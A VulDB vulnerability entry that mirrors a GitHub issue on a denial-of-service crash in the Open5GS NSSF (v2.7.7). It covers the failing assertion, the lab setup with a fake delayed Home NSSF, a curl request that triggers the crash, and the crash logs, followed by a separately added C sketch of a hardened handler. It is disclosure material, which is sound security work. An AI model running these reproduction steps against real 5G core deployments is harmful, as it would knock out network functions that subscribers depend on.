| Title | Open5gs NSSF v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
NSSF crashes if a Home-NSSF selection request causes an outbound
`nnssf-nsselection` query and the original client disconnects before the Home
NSSF response arrives.
In the NSSF client-response FSM path, the code retrieves the original
associated stream by ID:
```c
stream = ogs_sbi_stream_find_by_id(sbi_xact->assoc_stream_id);
...
nssf_nnrf_nsselection_handle_get_from_hnssf(home, stream, &message);
```
If the original requester has already timed out or reset the HTTP/2 stream,
`ogs_sbi_stream_find_by_id()` returns `NULL`. The called handler immediately
asserts that the stream pointer is non-NULL:
```c
ogs_assert(stream);
```
This makes a delayed but otherwise valid Home-NSSF response a process-killing
event once the original stream is gone.
### Steps to reproduce
This reproduction used the live Open5GS Docker lab with temporary test setup to
force the Home-NSSF path:
1. Add serving PLMN entries to the live lab configs so NRF accepts a fake Home
NSSF registration and local NSSF can build Home-NSSF discovery:
```yaml
# /home/ubuntu/docker-open5gs/configs/basic/nrf.yaml
nrf:
  serving:
    - plmn_id: { mcc: 001, mnc: 01 }
    - plmn_id: { mcc: 999, mnc: 70 }
```
```yaml
# /home/ubuntu/docker-open5gs/configs/basic/nssf.yaml
nssf:
  serving:
    - plmn_id: { mcc: 001, mnc: 01 }
```
2. Restart `nrf` and `nssf`.
3. Register a fake Home NSSF into NRF with a long heartbeat and an
`nnssf-nsselection` service endpoint pointing to a local delayed h2c test
server (`10.33.33.1:18081` in this live setup).
4. Run a delayed Home-NSSF responder that accepts HTTP/2 cleartext and returns
a valid `AuthorizedNetworkSliceInfo` only after 3 seconds.
5. Send the original request with a 1-second timeout so the client aborts
before the delayed response returns:
```bash
curl --http2-prior-knowledge --max-time 1 -sS -i --get \
'http://10.33.33.5/nnssf-nsselection/v2/network-slice-information' \
--data-urlencode 'nf-id=test-amf' \
--data-urlencode 'nf-type=AMF' \
--data-urlencode 'home-plmn-id={"mcc":"999","mnc":"70"}' \
--data-urlencode 'slice-info-request-for-pdu-session={"sNssai":{"sst":1,"sd":"000001"},"homeSnssai":{"sst":1,"sd":"000001"},"roamingIndication":"HOME_ROUTED_ROAMING"}'
```
6. Wait for the delayed Home-NSSF response to arrive, then check the NSSF
container state and logs.
### Logs
```shell
Original requester:
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
Delayed Home-NSSF backend saw the request:
GET /nnssf-nsselection/v2/network-slice-information?slice-info-request-for-pdu-session=%7B%22sNssai%22%3A%7B%22sst%22%3A1%2C%22sd%22%3A%22000001%22%7D%2C%22roamingIndication%22%3A%22HOME_ROUTED_ROAMING%22%7D&nf-id=f806e06c-3509-41f1-a3ee-09fbeb9317ec&snssai=%7B%22sst%22%3A1%2C%22sd%22%3A%22000001%22%7D&nf-type=NSSF
Container state:
exited 139 2026-04-10T18:25:33.593273294Z
NSSF logs:
04/10 18:25:31.450: [sbi] INFO: RST_STREAM received: stream_id=1 (../lib/sbi/nghttp2-server.c:1288)
04/10 18:25:33.483: [nssf] FATAL: nssf_nnrf_nsselection_handle_get_from_hnssf: Assertion `stream' failed. (../src/nssf/nnssf-handler.c:189)
```
### Expected behaviour
If the original requester disconnects before the Home-NSSF response arrives,
NSSF should discard the late response or clean up the transaction safely without
touching a dead stream.
### Observed Behaviour
The original client times out, the stream is closed, and the later Home-NSSF
response causes NSSF to assert on a `NULL` stream pointer and exit with code
`139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Source | ⚠️ https://github.com/open5gs/open5gs/issues/4431 |
|---|
| User | FrankyLin (UID 94345) |
|---|
| Submission | 20.04.2026 20:09 (1 month ago) |
|---|
| Moderation | 07.05.2026 18:56 (17 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 361906 [Open5GS up to 2.7.7 NSSF nghttp2-server.c ogs_sbi_stream_find_by_id Denial of Service] |
|---|
| Points | 20 |
|---|
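
The expected behaviour described in the report (discard a late Home-NSSF response once the originating stream is gone), as an added C sketch that is not Open5GS code or the project's fix. `stream_t`, `xact_t`, the pool and every function name here are hypothetical stand-ins for the SBI stream lookup.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-ins for the SBI stream pool; not Open5GS code. */
#define MAX_STREAMS 8
typedef struct { uint32_t id; int open; int responses_sent; } stream_t;
typedef struct { uint32_t assoc_stream_id; int released; } xact_t;
enum { LATE_RESPONSE_DROPPED = 0, RESPONSE_FORWARDED = 1 };
static stream_t pool[MAX_STREAMS];

/* Lookup by ID: returns NULL once the requester's stream is closed. */
static stream_t *stream_find_by_id(uint32_t id)
{
    for (size_t i = 0; i < MAX_STREAMS; i++)
        if (pool[i].open && pool[i].id == id)
            return &pool[i];
    return NULL;
}

/* Hardened late-response path: a missing stream is an expected runtime
 * condition (client timeout or RST_STREAM), so it is handled, not asserted. */
static int handle_home_response(xact_t *xact)
{
    stream_t *stream = stream_find_by_id(xact->assoc_stream_id);
    xact->released = 1;            /* transaction is freed on both paths */
    if (stream == NULL) {
        fprintf(stderr, "stream %u gone, dropping late response\n",
                (unsigned)xact->assoc_stream_id);
        return LATE_RESPONSE_DROPPED;
    }
    stream->responses_sent++;      /* requester still there: forward */
    return RESPONSE_FORWARDED;
}

/* Constructed scenario: open stream 1, optionally reset it before the
 * delayed Home-NSSF response is processed. Returns -1 on a leaked xact. */
static int scenario(int client_resets)
{
    xact_t xact = { .assoc_stream_id = 1, .released = 0 };
    memset(pool, 0, sizeof(pool));
    pool[0] = (stream_t){ .id = 1, .open = 1, .responses_sent = 0 };
    if (client_resets)
        pool[0].open = 0;          /* models RST_STREAM from the client */
    int rc = handle_home_response(&xact);
    return xact.released ? rc : -1;
}

int main(void) { printf("live=%d reset=%d\n", scenario(0), scenario(1)); return 0; }
```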